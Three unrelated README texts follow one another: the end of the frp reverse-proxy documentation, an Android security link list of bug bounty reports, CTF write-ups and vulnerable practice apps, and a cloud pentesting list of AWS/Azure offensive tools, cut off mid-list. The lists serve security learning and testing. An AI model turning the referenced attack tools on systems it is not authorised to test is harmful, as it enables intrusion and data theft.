`health_check_type = tcp` or `health_check_type = http` to enable health check. With health check type **tcp**, the service port will be pinged (TCPing): ```ini # frpc.ini [test1] type = tcp local_port = 22 remote_port = 6000 # Enable TCP health check health_check_type = tcp # TCPing timeout seconds health_check_timeout_s = 3 # If health check failed 3 times in a row, the proxy will be removed from frps health_check_max_failed = 3 # A health check every 10 seconds health_check_interval_s = 10 ``` With health check type **http**, an HTTP request will be sent to the service and an HTTP 2xx OK response is expected: ```ini # frpc.ini [web] type = http local_ip = 127.0.0.1 local_port = 80 custom_domains = test.example.com # Enable HTTP health check health_check_type = http # frpc will send a GET request to '/status' # and expect an HTTP 2xx OK response health_check_url = /status health_check_timeout_s = 3 health_check_max_failed = 3 health_check_interval_s = 10 ``` ### Rewriting the HTTP Host Header By default frp does not modify the tunneled HTTP requests at all as it's a byte-for-byte copy. However, speaking of web servers and HTTP requests, your web server might rely on the `Host` HTTP header to determine the website to be accessed. frp can rewrite the `Host` header when forwarding the HTTP requests, with the `host_header_rewrite` field: ```ini # frpc.ini [web] type = http local_port = 80 custom_domains = test.example.com host_header_rewrite = dev.example.com ``` The HTTP request will have the `Host` header rewritten to `Host: dev.example.com` when it reaches the actual web server, although the request from the browser probably has `Host: test.example.com`. ### Setting other HTTP Headers Similar to `Host`, You can override other HTTP request headers with proxy type `http`. ```ini # frpc.ini [web] type = http local_port = 80 custom_domains = test.example.com host_header_rewrite = dev.example.com header_X-From-Where = frp ``` Note that parameter(s) prefixed with `header_` will be added to HTTP request headers. In this example, it will set header `X-From-Where: frp` in the HTTP request. ### Get Real IP #### HTTP X-Forwarded-For This feature is for http proxy only. You can get user's real IP from HTTP request headers `X-Forwarded-For`. #### Proxy Protocol frp supports Proxy Protocol to send user's real IP to local services. It support all types except UDP. Here is an example for https service: ```ini # frpc.ini [web] type = https local_port = 443 custom_domains = test.example.com # now v1 and v2 are supported proxy_protocol_version = v2 ``` You can enable Proxy Protocol support in nginx to expose user's real IP in HTTP header `X-Real-IP`, and then read `X-Real-IP` header in your web service for the real IP. ### Require HTTP Basic Auth (Password) for Web Services Anyone who can guess your tunnel URL can access your local web server unless you protect it with a password. This enforces HTTP Basic Auth on all requests with the username and password specified in frpc's configure file. It can only be enabled when proxy type is http. ```ini # frpc.ini [web] type = http local_port = 80 custom_domains = test.example.com http_user = abc http_pwd = abc ``` Visit `http://test.example.com` in the browser and now you are prompted to enter the username and password. ### Custom Subdomain Names It is convenient to use `subdomain` configure for http and https types when many people share one frps server. ```ini # frps.ini subdomain_host = frps.com ``` Resolve `*.frps.com` to the frps server's IP. This is usually called a Wildcard DNS record. ```ini # frpc.ini [web] type = http local_port = 80 subdomain = test ``` Now you can visit your web service on `test.frps.com`. Note that if `subdomain_host` is not empty, `custom_domains` should not be the subdomain of `subdomain_host`. ### URL Routing frp supports forwarding HTTP requests to different backend web services by url routing. `locations` specifies the prefix of URL used for routing. frps first searches for the most specific prefix location given by literal strings regardless of the listed order. ```ini # frpc.ini [web01] type = http local_port = 80 custom_domains = web.example.com locations = / [web02] type = http local_port = 81 custom_domains = web.example.com locations = /news,/about ``` HTTP requests with URL prefix `/news` or `/about` will be forwarded to **web02** and other requests to **web01**. ### TCP Port Multiplexing frp supports receiving TCP sockets directed to different proxies on a single port on frps, similar to `vhost_http_port` and `vhost_https_port`. The only supported TCP port multiplexing method available at the moment is `httpconnect` - HTTP CONNECT tunnel. When setting `tcpmux_httpconnect_port` to anything other than 0 in frps under `[common]`, frps will listen on this port for HTTP CONNECT requests. The host of the HTTP CONNECT request will be used to match the proxy in frps. Proxy hosts can be configured in frpc by configuring `custom_domain` and / or `subdomain` under `type = tcpmux` proxies, when `multiplexer = httpconnect`. For example: ```ini # frps.ini [common] bind_port = 7000 tcpmux_httpconnect_port = 1337 ``` ```ini # frpc.ini [common] server_addr = x.x.x.x server_port = 7000 [proxy1] type = tcpmux multiplexer = httpconnect custom_domains = test1 local_port = 80 [proxy2] type = tcpmux multiplexer = httpconnect custom_domains = test2 local_port = 8080 ``` In the above configuration - frps can be contacted on port 1337 with a HTTP CONNECT header such as: ``` CONNECT test1 HTTP/1.1\r\n\r\n ``` and the connection will be routed to `proxy1`. ### Connecting to frps via HTTP PROXY frpc can connect to frps using HTTP proxy if you set OS environment variable `HTTP_PROXY`, or if `http_proxy` is set in frpc.ini file. It only works when protocol is tcp. ```ini # frpc.ini [common] server_addr = x.x.x.x server_port = 7000 http_proxy = http://user:[email protected]:8080 ``` ### Range ports mapping Proxy with names that start with `range:` will support mapping range ports. ```ini # frpc.ini [range:test_tcp] type = tcp local_ip = 127.0.0.1 local_port = 6000-6006,6007 remote_port = 6000-6006,6007 ``` frpc will generate 8 proxies like `test_tcp_0`, `test_tcp_1`, ..., `test_tcp_7`. ### Client Plugins frpc only forwards requests to local TCP or UDP ports by default. Plugins are used for providing rich features. There are built-in plugins such as `unix_domain_socket`, `http_proxy`, `socks5`, `static_file`, `http2https`, `https2http`, `https2https` and you can see [example usage](#example-usage). Specify which plugin to use with the `plugin` parameter. Configuration parameters of plugin should be started with `plugin_`. `local_ip` and `local_port` are not used for plugin. Using plugin **http_proxy**: ```ini # frpc.ini [http_proxy] type = tcp remote_port = 6000 plugin = http_proxy plugin_http_user = abc plugin_http_passwd = abc ``` `plugin_http_user` and `plugin_http_passwd` are configuration parameters used in `http_proxy` plugin. ### Server Manage Plugins Read the [document](/doc/server_plugin.md). Find more plugins in [gofrp/plugin](https://github.com/gofrp/plugin). ## Development Plan * Log HTTP request information in frps. ## Contributing Interested in getting involved? We would like to help you! * Take a look at our [issues list](https://github.com/fatedier/frp/issues) and consider sending a Pull Request to **dev branch**. * If you want to add a new feature, please create an issue first to describe the new feature, as well as the implementation approach. Once a proposal is accepted, create an implementation of the new features and submit it as a pull request. * Sorry for my poor English. Improvements for this document are welcome, even some typo fixes. * If you have great ideas, send an email to [email protected]. **Note: We prefer you to give your advise in [issues](https://github.com/fatedier/frp/issues), so others with a same question can search it quickly and we don't need to answer them repeatedly.** ## Donation If frp helps you a lot, you can support us by: ### GitHub Sponsors Support us by [Github Sponsors](https://github.com/sponsors/fatedier). You can have your company's logo placed on README file of this project. ### PayPal Donate money by [PayPal](https://www.paypal.me/fatedier) to my account **[email protected]**.
<div align="center"> <a href="https://github.com/iamsarvagyaa/AndroidSecNotes"><img src="static/cover.png" alt="Android Security Notes"></a><br/> </div> <p align="center"> <a href="#getting-started">Getting Started?</a> » <a href="https://www.buymeacoffee.com/iamsarvagyaa">Buy me a coffee</a> » <a href="#contact-me">Wanna Talk?</a></a> </p> **** :rocket: ***Android Security Notes? »*** Here, You will find important concepts, resources, hand-crafted and self-curated notes written by a kind-hearted fellow. The main purpose of this project is to serve as a First-Aid to newbies (like me) and intermediate peep who perform android security. :handshake: ***Wanna contribute? »*** If you see something wrong or incorrectly interpreted then open an issue or send a pull request. We appreciate your contribution and all suggestions/PRs are welcome. You can also ping me on twitter@iamsarvagyaa. :scroll: ***Things to be done! »*** I started this project from scratch. Steadily, I will update more resources and notes that I've found useful while learning Android Security. The upcoming lineup for this project ... - [ ] I will add more resources - [ ] Add conference papers, notes and more - [ ] Write more blogposts related to android security ... **** <a name="synopsis"></a> ## :spiral_notepad: Synopsis - [Getting Started](#getting-started) - [HackerOne Reports](#h1-reports) - [BugBounty Writeups](#bugbounty-writeups) - [CTF Challenge Writeups](#ctf-writeups) - [Healthy Digests](#healthy-digests) - [Vulnerable Applications](#vulnapk) <a name="getting-started"></a> ### [↑](#synopsis) Getting Started - [Diving in Android Security](https://iamsarvagyaa.github.io/android-security-part-one/) - [Android Security - Understanding Android Basics](https://payatu.com/blog/amit/Need-to-know-Android) - [Android Pentesting Lab Setup](https://payatu.com/blog/amit/android_pentesting_lab) - [Getting started with Frida on Android Apps](https://payatu.com/blog/amit/Getting%20_started_with_Frida) - [Android Penetration Testing: Apk Reverse Engineering](https://www.hackingarticles.in/android-penetration-testing-apk-reverse-engineering/) - [Android Penetration Testing: APK Reversing (Part 2)](https://www.hackingarticles.in/android-penetration-testing-apk-reversing-part-2/) <a name="h1-reports"></a> ### [↑](#synopsis) HackerOne Reports - Account hijacking possible through ADB backup feature :: [#12617](https://hackerone.com/reports/12617) - Twitter android app Fragment Injection :: [#43988](https://hackerone.com/reports/43988) - Bypass Setup by External Activity Invoke :: [#55064](https://hackerone.com/reports/55064) - Webview Vulnerablity in OwnCloud apk :: [#87835](https://hackerone.com/reports/87835) - No permission set on Activities [Android App] :: [#145402](https://hackerone.com/reports/145402) - Flaw in login with twitter to steal Oauth tokens :: [#44492](https://hackerone.com/reports/44492) - Authentication Failed Mobile version :: [#55530](https://hackerone.com/reports/55530) - Multiple Stored XSS on Sanbox.veris.in through Veris Frontdesk Android App :: [#121275](https://hackerone.com/reports/121275) - Coinbase Android Security Vulnerabilities :: [#5786](https://hackerone.com/reports/5786) - Insecure Data Storage in Vine Android App :: [#44727](https://hackerone.com/reports/44727) - Sending payments via QR code does not require confirmation :: [#126784](https://hackerone.com/reports/126784) - Bypass pin(4 digit passcode on your android app) :: [#50884](https://hackerone.com/reports/50884) - REG: Content provider information leakage :: [#146179](https://hackerone.com/reports/146179) - Shopify android client all API request's response leakage, including access_token, cookie, response header, response body content :: [#56002](https://hackerone.com/reports/56002) - HTML/XSS rendered in Android App of Crashlytics through fabric.io :: [#41856](https://hackerone.com/reports/41856) - ByPassing the email Validation Email on Sign up process in mobile apps :: [#57764](https://hackerone.com/reports/57764) - Insecure Local Data Storage : Application stores data using a binary sqlite database :: [#57918](https://hackerone.com/reports/57918) - Vulnerable to JavaScript injection. (WXS) (Javascript injection)! :: [#54631](https://hackerone.com/reports/54631) - Coinbase Android Application - Bitcoin Wallet Leaks OAuth Response Code :: [#5314](https://hackerone.com/reports/5314) - Reflected XSS in Zomato Mobile - category parameter :: [#230119](https://hackerone.com/reports/230119) - MEW Wallet PIN Bypass [Android] :: [#1242212](https://hackerone.com/reports/1242212) - Firebase Database Takeover in Zego Sense Android app :: [#1065134](https://hackerone.com/reports/1065134) - Bypass of biometrics security functionality is possible in Android application (com.shopify.mobile) :: [#637194](https://hackerone.com/reports/637194) - Persistant Arbitrary code execution in mattermost android :: [#1115864](https://hackerone.com/reports/1115864) - porcupiney.hairs : Java/Android - Insecure Loading of a Dex File :: [#1161956](https://hackerone.com/reports/1161956) - Unsafe deserialization leads to token leakage in PayPal & PayPal for Business [Android] :: [#453791](https://hackerone.com/reports/453791) - Cookie steal through content Uri :: [#876192](https://hackerone.com/reports/876192) - Bypassing Passcode/Device credentials :: [#747726](https://hackerone.com/reports/747726) - [Java] CWE-755: Query to detect Local Android DoS caused by NFE :: [#1061211](https://hackerone.com/reports/1061211) - Path traversal in ZIP extract routine on LINE Android :: [#859469](https://hackerone.com/reports/859469) - Android: Explanation of Access to app protected components vulnerability :: [#951691](https://hackerone.com/reports/951691) - Java: CWE-749 Unsafe resource loading in Android WebView leaking to injection attacks :: [#1011956](https://hackerone.com/reports/1011956) - Android WebViews in Twitter app are vulnerable to UXSS due to configuration and CVE-2020-6506 :: [#906433](https://hackerone.com/reports/906433) - Denial of Service | twitter.com & mobile.twitter.com :: [#903740](https://hackerone.com/reports/903740) - Insecure Storage and Overly Permissive API Keys in Android App :: [#753868](https://hackerone.com/reports/753868) - [Grab Android/iOS] Insecure deeplink leads to sensitive information disclosure :: [#401793](https://hackerone.com/reports/401793) - No session logout after changing password & alsoandroid sessions not shown in sessions list so they can be deleted :: [#194329](https://hackerone.com/reports/194329) - CVE-2019-5765: 1-click HackerOne account takeover on all Android devices :: [#563870](https://hackerone.com/reports/563870) - API Keys Hardcoded in Github repository :: [#766346](https://hackerone.com/reports/766346) - Changing email address on Twitter for Android unsets "Protect your Tweets" :: [#472013](https://hackerone.com/reports/472013) - Golden techniques to bypass host validations in Android apps :: [#431002](https://hackerone.com/reports/431002) - Improper protection of FileContentProvider :: [#331302](https://hackerone.com/reports/331302) - Extremly simple way to bypass Nextcloud-Client PIN/Fingerprint lock :: [#331489](https://hackerone.com/reports/331489) - Disclosure of all uploads to Cloudinary via hardcoded api secret in Android app :: [#351555](https://hackerone.com/reports/351555) - [Mail.Ru Android] Typo in permission name allows to write contacts without user knowledge :: [#440749](https://hackerone.com/reports/440749) - SQL Injection found in NextCloud Android App Content Provider :: [#291764](https://hackerone.com/reports/291764) - [Android] HTML Injection in BatterySaveArticleRenderer WebView :: [#176065](https://hackerone.com/reports/176065) - SQLi allow query restriction bypass on exposed FileContentProvider :: [#518669](https://hackerone.com/reports/518669) - [Zomato Android/iOS] Theft of user session :: [#328486](https://hackerone.com/reports/328486) - Protected Tweets setting overridden by Android app :: [#519059](https://hackerone.com/reports/519059) - Bypassing lock protection :: [#490946](https://hackerone.com/reports/490946) - Improper validation allows user to unlock Zomato Gold multiple times at the same restaurant within one day :: [#486629](https://hackerone.com/reports/486629) - Authorization bypass using login by phone option+horizontal escalation possible on Grab Android App :: [#205000](https://hackerone.com/reports/205000) - [IRCCloud Android] XSS in ImageViewerActivity :: [#283063](https://hackerone.com/reports/283063) - [IRCCloud Android] Theft of arbitrary files leading to token leakage :: [#288955](https://hackerone.com/reports/288955) - Two-factor authentication bypass on Grab Android App :: [#202425](https://hackerone.com/reports/202425) - Android - Access of some not exported content providers :: [#272044](https://hackerone.com/reports/272044) - Improper markup sanitisation in Simplenote Android application :: [#297547](https://hackerone.com/reports/297547) - [Android] XSS via start ContentActivity :: [#189793](https://hackerone.com/reports/189793) - [iOS/Android] Address Bar Spoofing Vulnerability :: [#175958](https://hackerone.com/reports/175958) - Access of Android protected components via embedded intent :: [#200427](https://hackerone.com/reports/200427) - Possible to steal any protected files on Android :: [#161710](https://hackerone.com/reports/161710) - [Quora Android] Possible to steal arbitrary files from mobile device :: [#258460](https://hackerone.com/reports/258460) - Multiple critical vulnerabilities in Odnoklassniki Android application :: [#97295](https://hackerone.com/reports/97295) - Android - Possible to intercept broadcasts about uploaded files :: [#167481](https://hackerone.com/reports/167481) - Download attachments with traversal path into any sdcard directory (incomplete fix 106097) :: [#284346](https://hackerone.com/reports/284346) - [IRCCloud Android] Opening arbitrary URLs/XSS in SAMLAuthActivity :: [#283058](https://hackerone.com/reports/283058) - Mapbox Android SDK uses Broadcast Receiver instead of Local Broadcast Manager :: [#192886](https://hackerone.com/reports/192886) - Twitter for android is exposing user's location to any installed android app :: [#185862](https://hackerone.com/reports/185862) - Vulnerable exported broadcast receiver :: [#289000](https://hackerone.com/reports/289000) - Android MailRu Email: Thirdparty can access private data files with small user interaction :: [#226191](https://hackerone.com/reports/226191) - Vine - overwrite account associated with email via android application :: [#187714](https://hackerone.com/reports/187714) - Activities are not Protected and able to crash app using other app (Can Malware or third parry app) :: [#65729](https://hackerone.com/reports/65729) - Account takeover intercepting magic link for Arrive app :: [#855618](https://hackerone.com/reports/855618) <a name="bugbounty-writeups"></a> ### [↑](#synopsis) BugBounty Writeups - [Brave — Stealing your cookies remotely](https://infosecwriteups.com/brave-stealing-your-cookies-remotely-1e09d1184675) - [Hack crypto secrets from heap memory to exploit Android application](https://infosecwriteups.com/hack-crypto-secrets-from-heap-memory-to-exploit-android-application-728097fcda3) - [Guest Blog Post: Firefox for Android LAN-Based Intent Triggering](https://blog.mozilla.org/attack-and-defense/2020/11/10/firefox-for-android-lan-based-intent-triggering/) - [Arbitrary File Write On Client By ADB Pull](https://daeken.svbtle.com/arbitrary-file-write-by-adb-pull) - [Vulnerability in Facebook Android app nets $10k bug bounty](https://portswigger.net/daily-swig/vulnerability-in-facebook-android-app-nets-10k-bug-bounty) - [Universal XSS in Android WebView (CVE-2020-6506)](https://alesandroortiz.com/articles/uxss-android-webview-cve-2020-6506/) - [How two dead accounts allowed REMOTE CRASH of any Instagram android user](https://www.valbrux.it/blog/2019/09/13/how-two-dead-users-allowed-remote-crash-of-any-instagram-android-user/) - [Don’t stop at one bug $$$$](https://infosecwriteups.com/dont-stop-at-one-bug-d3c56806b5) - [Arbitrary code execution on Facebook for Android through download feature](https://medium.com/@dPhoeniixx/arbitrary-code-execution-on-facebook-for-android-through-download-feature-fb6826e33e0f) - [Ability To Backdoor Facebook For Android](https://ash-king.co.uk/blog/backdoor-android-facebook) - [From Android Static Analysis to RCE on Prod](https://blog.dixitaditya.com/from-android-app-to-rce/) - [Smear phishing: a new Android vulnerability](https://jameshfisher.com/2020/08/06/smear-phishing-how-to-scam-an-android-user/) - [Hunting Android Application Bugs Using Android Studio](https://co0nan.gitbook.io/writeups/#reporting) - [Android pin bypass with rate limiting](https://balook.medium.com/android-pin-bypass-with-rate-limiting-a3f5dd811715) - [Global grant uri in Android 8.0-9.0](https://www.vulnano.com/2020/07/global-grant-uri-in-android-80-90-2018.html) - [From N/A to Resolved For BackBlaze Android App[Hackerone Platform] Bucket Takeove](https://medium.com/@pig.wig45/from-n-a-to-resolved-for-backblaze-android-app-hackerone-platform-bucket-takeover-f817692a590) - [Xiaomi Android : Harvest private/system files (Updated POC)](https://servicenger.com/blog/mobile/xiaomiharvestprivatefiles/) - [Indirect UXSS issue on a private Android target app](https://medium.com/@kunal94/indirect-uxss-issues-on-a-private-integrated-browser-219f6b809b6c) - [Full Account Takeover (Android Application)](https://vbharad.medium.com/full-account-takeover-android-application-78fa922f78c5) - [NFC Beaming Bypasses Security Controls in Android [CVE-2019-2114]](https://wwws.nightwatchcybersecurity.com/2019/10/24/nfc-beaming-bypasses-security-controls-in-android-cve-2019-2114/) - [Address bar spoofing in Firefox Lite for Android and the idiocy that followed](https://blog.0x48piraj.com/address-bar-spoofing-in-firefox-lite-for-android-and-the-idiocy-that-followed/) - [One Bug To Rule Them All: Modern Android Password Managers and FLAG_SECURE Misuse](https://blog.doyensec.com/2019/08/22/modern-password-managers-flag-secure.html) <a name="ctf-writeups"></a> ### [↑](#synopsis) CTF Challenge Writeups - [Good old friend - THCon 2021](https://cryptax.github.io/2021/06/14/thcon-goodold.html) - by cryptax - [draw.per - THCon 2021](https://cryptax.github.io/2021/06/14/thcon.html) - by cryptax - [Water Color - S4CTF 2021](https://github.com/1GN1tE/CTF_Writeups/tree/main/Writeups/S4CTF_2021/Water%20Color) - by 1gn1te - [Memedrive - RITSEC CTF 2021](https://klefz.se/2021/04/12/ritsec-ctf-2021-write-up/#memedrive) - by klefz - [ezpz - darkCON CTF](https://github.com/karma9874/CTF-Writeups/blob/master/DarkCON_CTF/ezpz/ezpz.md) - by karma9874 - [Fire in the Androiddd - darkCON CTF](https://github.com/karma9874/CTF-Writeups/blob/master/DarkCON_CTF/Fire%20in%20the%20Androiddd/Fire_in_the_Androiddd.md) - by karma9874 - [MobaDEX - HackTM CTF Finals 2020](https://pwndiary.com/hacktm-finals-2020-mobadex) - by umutoztunc - [hehe - PhantomCTF 3.0](https://github.com/FrigidSec/CTFWriteups/tree/master/PhantomCTF/Android/hehe) - by FrigidSec - [Vault 101 - Hackers Playground 2020](https://saketupadhyay.codes/2020/08/18/sstf-vault-wtireup.html) - by saketupadhyay - [android - Google Capture The Flag 2020](https://github.com/luker983/google-ctf-2020/tree/master/reversing/android) - by luker983 - [android - Google Capture The Flag 2020](https://sectt.github.io/writeups/GoogleCTF20/android/README) - by s3np41k1r1t0 - [android - Google Capture The Flag 2020](https://github.com/TFNS/writeups/blob/master/2020-08-24-GoogleCTF/android/README.md) - by TFNS - [android - Google Capture The Flag 2020](https://github.com/NicolaiSoeborg/ctf-writeups/tree/master/2020/Google%20CTF%202020/Android) - by NicolaiSoeborg - [prehistoric mario - ALLES! CTF 2020](https://github.com/ARESxCyber/Writeups/tree/master/ALLES!%20CTF%202020/prehistoric%20mario) - by ARESxCyber - [prehistoric mario - ALLES! CTF 2020](https://ashiq.co.za/posts/ALLES-CTF-Prehistoric-Mario-Writeup/) - by ashiq - [Tamarin - TokyoWesterns CTF 6th 2020](https://github.com/pwning/public-writeup/tree/master/twctf2020/tamarin) - by pwning - [Tamarin - TokyoWesterns CTF 6th 2020](https://hxp.io/blog/78/TokyoWesterns-CTF-6th-2020-selected-writeups/#Tamarin) - by hxp - [Tamarin - TokyoWesterns CTF 6th 2020](https://github.com/Hong5489/TrendMicroCTF2020/tree/main/mobile2) - by Hong5489 - [Chasing a lock - RaziCTF 2020](https://github.com/ternary-bits/CTF-Challenges/blob/master/android/razictf2020-chasing-a-lock/WRITEUP.md) - by ternary-bits - [Chasing a lock - RaziCTF 2020](https://ctftime.org/writeup/24550) - by Londek - [Chasing a lock - RaziCTF 2020](https://github.com/t3rmin0x/CTF-Writeups/tree/master/Razi%20CTF/Android/Chasing%20A%20Lock) - by t3rmin0x - [Chasing a lock - RaziCTF 2020](https://blackbeard666.github.io/pwn_exhibit/content/2020_CTF/RaziCTF/android_lock/lock_writeup.html) - by blackbear666 - [CTF Coin - RaziCTF 2020](https://ctftime.org/writeup/24560) - by cthulhu - [CTF Coin - RaziCTF 2020](https://github.com/t3rmin0x/CTF-Writeups/tree/master/Razi%20CTF/Android/CTF%20Coin) - by t3rmin0x - [Friends - RaziCTF 2020](https://ctftime.org/writeup/24559) - by cthulhu - [Friends - RaziCTF 2020](https://github.com/t3rmin0x/CTF-Writeups/tree/master/Razi%20CTF/Android/Friends) - by t3rmin0x - [Meeting - RaziCTF 2020](https://github.com/t3rmin0x/CTF-Writeups/tree/master/Razi%20CTF/Android/Meeting) - by t3rmin0x - [Strong padlock - RaziCTF 2020](https://github.com/t3rmin0x/CTF-Writeups/tree/master/Razi%20CTF/Android/Strong%20Padlock) - by t3rmin0x - [Strong padlock - RaziCTF 2020](https://ctftime.org/writeup/24500) - by Al3x2 - [Strong padlock - RaziCTF 2020](https://ctftime.org/writeup/24549) - by Londek - [tough - RaziCTF 2020](https://github.com/t3rmin0x/CTF-Writeups/tree/master/Razi%20CTF/Android/Tough) - by t3rmin0x <a name="healthy-digests"></a> ### [↑](#synopsis) Healthy Digests - [Let's Reverse Engineer an Android App!](https://yasoob.me/posts/reverse-engineering-android-apps-apktool/) - Well written blogpost by [M.Yasoob Ullah Khalid](https://github.com/yasoob), which explains how APK reverse engineering generally works. - [Reverse Engineering Nike Run Club Android App Using Frida](https://yasoob.me/posts/reverse-engineering-nike-run-club-using-frida-android/) - In this blogpost [M.Yasoob Ullah Khalid](https://github.com/yasoob), tell about How we can reverse an android application using Frida. - [Android Application Security Series](https://manifestsecurity.com/android-application-security/) - Well structured, Android Application Security Series. Start learning from this healthy digest. In this series Aditya covered OWASP MOBILE TOP 10 vulnerabilities in detailed form. - [Android App Reverse Engineering 101](https://www.ragingrock.com/AndroidAppRE/) - Wanna learn reverse engineering of Android Applications? If yes, then dive into this course. I learned a lot from this, huge thanks to maddiestone. - [MOBISEC](https://mobisec.reyammer.io/) - Hands-On classes, slides related to mobile security. I recommend everyone to watch all the recordings of class sessions. Kudos [Yanick Fratantonio](https://twitter.com/reyammer) sir, thank you for all the sessions. - [Oversecured Blog](https://blog.oversecured.com/) - One of the best blog for android security, I love to read all the posts twice in a month. :heart: <a name="vulnapk"></a> ### [↑](#synopsis) Vulnerable Applications - [hpAndro](http://ctf.hpandro.raviramesh.info/) - One of the nice vulnerable android application to practice. Plenty of challenges are there, and most of the challenges are beginner friendly. I recommend everyone to checkout this vulnerable application. This challenge is maintained by [hpandro1337](https://twitter.com/hpandro1337), you can also checkout his YouTube Channel : [Android AppSec](https://www.youtube.com/AndroidAppSec). - [InjuredAndroid](https://github.com/B3nac/InjuredAndroid) - A vulnerable android application ctf examples based on bug bounty findings, exploitation concepts, and pure creativity. Created and maintained by [B3nac](https://twitter.com/B3nac). - [Oversecured Vulnerable Android App](https://github.com/oversecured/ovaa) - an Android app that aggregates all the platform's known and popular security vulnerabilities. Plenty of vulnerabilities are there to practice our Security skills. Vulnerable Lab maintained by [Bagipro](https://twitter.com/_bagipro). - [MOBISEC Challenges](https://mobisec.reyammer.io/challs) - Plenty of challenges are there related to Android App development, Reversing of Android Application and Exploitations. Challenges created by sir [Yanick Fratantonio](https://twitter.com/reyammer). This is in my TODO list... <a name="contact-me"></a> ### Wanna Contact with me? - LinkedIn : [iamsarvagyaa](https://www.linkedin.com/in/iamsarvagyaa/) - Twitter : [iamsarvagyaa](https://twitter.com/iamsarvagyaa) - Instagram : [iamsarvagyaa](https://instagram.com/iamsarvagyaa) - Keybase : [iamsarvagyaa](https://keybase.io/iamsarvagyaa) - E-mail : [[email protected]](mailto:[email protected]) > :mega: If you enjoyed this project and wanna appreciate me, Buy me a cup of coffee. You can also help via sharing this project among the community to help it grow. You may support me on [Buy me a coffee](https://www.buymeacoffee.com/iamsarvagyaa), monetary contributions are always welcome. If you wish to sponsor this project, ping me - iamsarvagyaa[at]gmail.com
# Awesome-Cloud-PenTest ## Cloud PenTest - AWS and Azure by Joas ## What is AWS - https://docs.aws.amazon.com/ - https://github.com/awsdocs ## Extras Resources - https://github.com/enaqx/awesome-pentest - https://www.sans.org/cyber-security-courses/cloud-penetration-testing/ - https://www.udemy.com/course/cloud-hacking/ - https://aws.amazon.com/pt/security/penetration-testing/ - https://cloudacademy.com/course/aws-security-fundamentals/introduction-74/ - https://cobalt.io/blog/what-you-need-to-know-about-aws-pentesting - https://gracefulsecurity.com/an-introduction-to-penetration-testing-aws-same-same-but-different/ - https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/ - https://securityboulevard.com/2021/03/aws-penetration-testing-essential-guidance-for-2021/ - https://www.darkskope.com/aws-penetration-testing - https://bootcamps.pentesteracademy.com/certifications - https://docs.microsoft.com/pt-br/azure/security/fundamentals/pen-testing - https://www.youtube.com/watch?v=lOhvIooWzOg - https://gbhackers.com/cloud-computing-penetration-testing-checklist-important-considerations/ - https://www.linkedin.com/pulse/cloud-computing-penetration-testing-checklist-priya-james-ceh-1/ - https://www.happiestminds.com/blogs/tag/penetration-testing-checklist/ - https://blog.rsisecurity.com/how-to-conduct-cloud-penetration-testing/ - https://www.nettitude.com/uk/penetration-testing/cloud-service-testing/ - https://techbeacon.com/enterprise-it/pen-testing-cloud-based-apps-step-step-guide - https://book.hacktricks.xyz/cloud-security/cloud-security-review - https://medium.com/@jonathanchelmus/cloud-pentesting-for-noobs-da867d9c5ecb - https://pt.slideshare.net/TeriRadichel/are-you-ready-for-a-cloud-pentest - https://www.blackhillsinfosec.com/tag/pentest/ - https://www.youtube.com/watch?v=aqumgrSBDM4 - My ebook: https://drive.google.com/file/d/14rthHtAgbd--pWEmzmj4i5j59Rl6dLC1/view?usp=sharing - https://hackerassociate.com/training-and-certification/ocpt-offensive-cloud-penetration-testing/ - https://ine.com/pages/cloudpentesting - https://hausec.com/2020/01/31/attacking-azure-azure-ad-and-introducing-powerzure/ - https://gracefulsecurity.com/an-introduction-to-pentesting-azure/ - https://rhinosecuritylabs.com/cloud-security/common-azure-security-vulnerabilities/ ## My Social Networks - https://www.linkedin.com/in/joas-antonio-dos-santos - https://twitter.com/C0d3Cr4zy ## What is Azure - https://docs.microsoft.com/pt-br/azure/?product=featured - https://github.com/MicrosoftDocs/azure-docs ## PenTest Policy - https://docs.microsoft.com/en-us/azure/security/fundamentals/pen-testing - https://www.microsoft.com/en-us/msrc/pentest-rules-of-engagement?rtc=1 - https://aws.amazon.com/pt/security/penetration-testing/ - https://msrc.microsoft.com/en-us/engage/pentest ## PenTest in AWS - Offensive Security - https://github.com/carnal0wnage/weirdAAL - https://github.com/RhinoSecurityLabs/pacu - https://github.com/disruptops/cred_scanner - https://github.com/dagrz/aws_pwn - https://github.com/MindPointGroup/cloudfrunt - https://github.com/prevade/cloudjack - https://github.com/andresriancho/nimbostratus - https://github.com/zricethezav/gitleaks - https://github.com/dxa4481/truffleHog - https://github.com/securing/DumpsterDiver - https://github.com/gruntwork-io/cloud-nuke - https://github.com/ThreatResponse/mad-king - https://github.com/mozilla/MozDef - https://github.com/puresec/lambda-proxy - https://github.com/Static-Flow/CloudCopy - https://github.com/andresriancho/enumerate-iam - https://github.com/Voulnet/barq - https://github.com/RhinoSecurityLabs/ccat - https://github.com/bishopfox/dufflebag - https://github.com/splunk/attack_range - https://github.com/elitest/Redboto - https://github.com/Skyscanner/whispers - https://github.com/0xsha/cloudbrute - https://github.com/Parasimpaticki/sandcastle - https://github.com/smiegles/mass3 - https://github.com/koenrh/s3enum - https://github.com/tomdev/teh_s3_bucketeers - https://github.com/eth0izzle/bucket-stream - https://github.com/gwen001/s3-buckets-finder - https://github.com/aaparmeggiani/s3find - https://github.com/random-robbie/slurp - https://github.com/clario-tech/s3-inspector - https://github.com/pbnj/s3-fuzzer - https://github.com/jordanpotti/AWSBucketDump - https://github.com/bear/s3scan - https://github.com/sa7mon/S3Scanner - https://github.com/magisterquis/s3finder - https://github.com/abhn/S3Scan - https://github.com/whitfin/s3-meta - https://github.com/whitfin/s3-meta - https://github.com/vr00n/Amazon-Web-Shenanigans - https://github.com/FishermansEnemy/bucket_finder - https://github.com/brianwarehime/inSp3ctor - https://github.com/Atticuss/bucketcat - https://github.com/nahamsec/lazys3 - https://github.com/Ucnt/aws-s3-data-finder - https://github.com/securing/BucketScanner - https://github.com/VirtueSecurity/aws-extender-cli - https://github.com/cr0hn/festin - https://github.com/kurmiashish/S3Insights - https://github.com/nccgroup/s3_objects_check - https://github.com/toniblyx/my-arsenal-of-aws-security-tools - https://rhinosecuritylabs.com/aws/aws-essentials-top-5-tests-penetration-testing-aws/ - https://rhinosecuritylabs.com/aws/pacu-open-source-aws-exploitation-framework/ - https://github.com/eth0izzle/shhgit - https://www.getastra.com/blog/security-audit/aws-penetration-testing/ - https://owasp.org/www-pdf-archive/Aws_security_joel_leino.pdf - https://rhinosecuritylabs.com/penetration-testing/penetration-testing-aws-cloud-need-know/ - https://github.com/PacktPublishing/Hands-On-AWS-Penetration-Testing-with-Kali-Linux - 